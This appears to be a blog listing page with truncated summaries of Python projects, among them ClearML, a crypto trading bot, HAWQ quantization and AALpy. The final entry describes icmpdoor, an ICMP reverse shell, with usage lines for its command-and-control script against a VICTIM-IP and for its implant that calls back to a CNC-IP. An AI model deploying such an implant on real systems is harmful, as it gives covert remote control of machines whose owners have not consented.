Auto-Magical Suite of tools to streamline your ML workflow

ClearML ClearML – Auto-Magical Suite of tools to streamline your ML workflow. Experiment Manager, ML-Ops and Data-Management ClearML is a ML/DL development and production suite, it contains three main modules: Experiment Manager – Automagical experiment tracking, environments and results ML-Ops – Automation, Pipelines & Orchestration solution for ML/DL jobs (K8s / Cloud / bare-metal) Data-Management – Fully differentiable data management & version control solution on top of object-storage(S3/GS/Azure/NAS) ClearML Experiment Manager Adding only 2 lines to your code gets you […]

Read more

Cryptocurrency trading bot with a graphical user interface

algobot Cryptocurrency trading bot that allows users to create strategies and then backtest, simulate, or run live bots using them. Telegram integration has been added to support easier and remote trading. Installation Please make sure you have an installation of at least Python 3.6. For Linux/MacOS: python -m venv .venv source .venv/bin/activate pip install -r requirements.txt For Windows: python -m venv venv call venv/Scripts/activate pip install -r requirements.txt If your install fails, please make sure to have Visual Studio Build […]

Read more

Pyright extension for coc.nvim

pyright.enable Enable coc-pyright extension true python.analysis.autoImportCompletions Determines whether pyright offers auto-import completions true python.analysis.autoSearchPaths Automatically add common search paths like ‘src’ true python.analysis.diagnosticMode Analyzes and reports errors for open only or all files in workspace openFilesOnly python.analysis.stubPath Path to directory containing custom type stub files typings python.analysis.typeshedPaths Paths to look for typeshed modules [] python.analysis.diagnosticSeverityOverrides Override the severity levels for individual diagnostics {} python.analysis.typeCheckingMode Defines the default rule set for type checking basic python.analysis.useLibraryCodeForTypes Use library implementations to extract type […]

Read more

Neural networks applied in recognizing guitar chords using python

Chords.py Neural networks applied in recognizing guitar chords using python, AutoML.NET with C# and .NET Core The demo application is written in C# with .NETCore. As of July 9, 2020, the only version available is for windows 10 64 bits. Versions for Linux are expected to come as a console application. Installing the application. The demo app uses AutoML .NET as the default prediction engine and ONNX runtime as the legacy prediction engine to run the exported model created on […]

Read more

Python vs Java: Object Oriented Programming

Java programmers making a move to Python often struggle with Python’s approach to object-oriented programming (OOP). The approach to working with objects, variable types, and other language capabilities taken by Python vs Java are quite different. It can make switching between both languages very confusing. This course compares and contrasts object-oriented programming support in Python vs Java. By the end, you’ll be able to apply your knowledge of object-oriented programming to Python, understand how to reinterpret your understanding of Java […]

Read more

Enhancing Unsupervised Video Representation Learning

DSM The source code for paper Enhancing Unsupervised Video Representation Learning by Decoupling the Scene and the Motion 1. Introduction (scene-dominated to motion-dominated) Video datasets are usually scene-dominated, We propose to decouple the scene and the motion (DSM) with two simple operations, so that the model attention towards the motion information is better paid. The generated triplet is as below: What DSM learned? With DSM pretrain, the model learn to focus on motion region (Not necessarily actor) powerful without one […]

Read more

An advanced quantization library written for PyTorch

Hessian AWare Quantization HAWQ is an advanced quantization library written for PyTorch. HAWQ enables low-precision and mixed-precision uniform quantization, with direct hardware implementation through TVM. Installation PyTorch version >= 1.4.0 Python version >= 3.6 For training new models, you’ll also need NVIDIA GPUs and NCCL To install HAWQ and develop locally: git clone https://github.com/Zhen-Dong/HAWQ.git cd HAWQ pip install -r requirements.txt Getting Started Quantization-Aware Training An example to run uniform 8-bit quantization for resnet50 on ImageNet. export CUDA_VISIBLE_DEVICES=0 python quant_train.py -a […]

Read more

An Active Automata Learning Library Written in Python

AALpy AALpy is a light-weight active automata learning library written in pure Python. By implementing a single method and a few lines of configuration, you can start learning automata. Whether you work with regular languages or you would like to learn models of reactive systems, AALpy supports a wide range of modeling formalisms, including deterministic, non-deterministic, and stochastic automata. You can use it to learn deterministic finite automata, Moore machines, and Mealy machines of deterministic systems. If the system that […]

Read more

An easy way to interact with graph databases using Jupyter notebooks

Graph Notebook: easily query and visualize graphs The graph notebook provides an easy way to interact with graph databases using Jupyter notebooks. Using this open-source Python package, you can connect to any graph database that supports the Apache TinkerPop or the RDF SPARQL graph model. These databases could be running locally on your desktop or in the cloud. Graph databases can be used to explore a variety of use cases including knowledge graphs and identity graphs. Visualizing Gremlin queries: Visualizing […]

Read more

An ICMP rev shell written in Python3 and scapy

icmpdoor – ICMP Reverse Shell icmpdoor is an ICMP rev shell written in Python3 and scapy. Tested on Ubuntu 20.04, Debian 10 (Kali Linux), and Windows 10. Python version usage (both Windows and Linux): ./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command and Control) ./icmpdoor.py -i INTERFACE -d CNC-IP (Implant) Binary Windows version usage version: ./icmp-cnc.exe -d VICTIM-IP (Command and Control) ./icmpdoor.exe -d CNC-IP (Implant) Binary Linux version usage version: ./icmp-cnc -d VICTIM-IP (Command and Control) ./icmpdoor -d CNC-IP (Implant) Parameters details: […]

Read more
1 660 661 662 663 664 912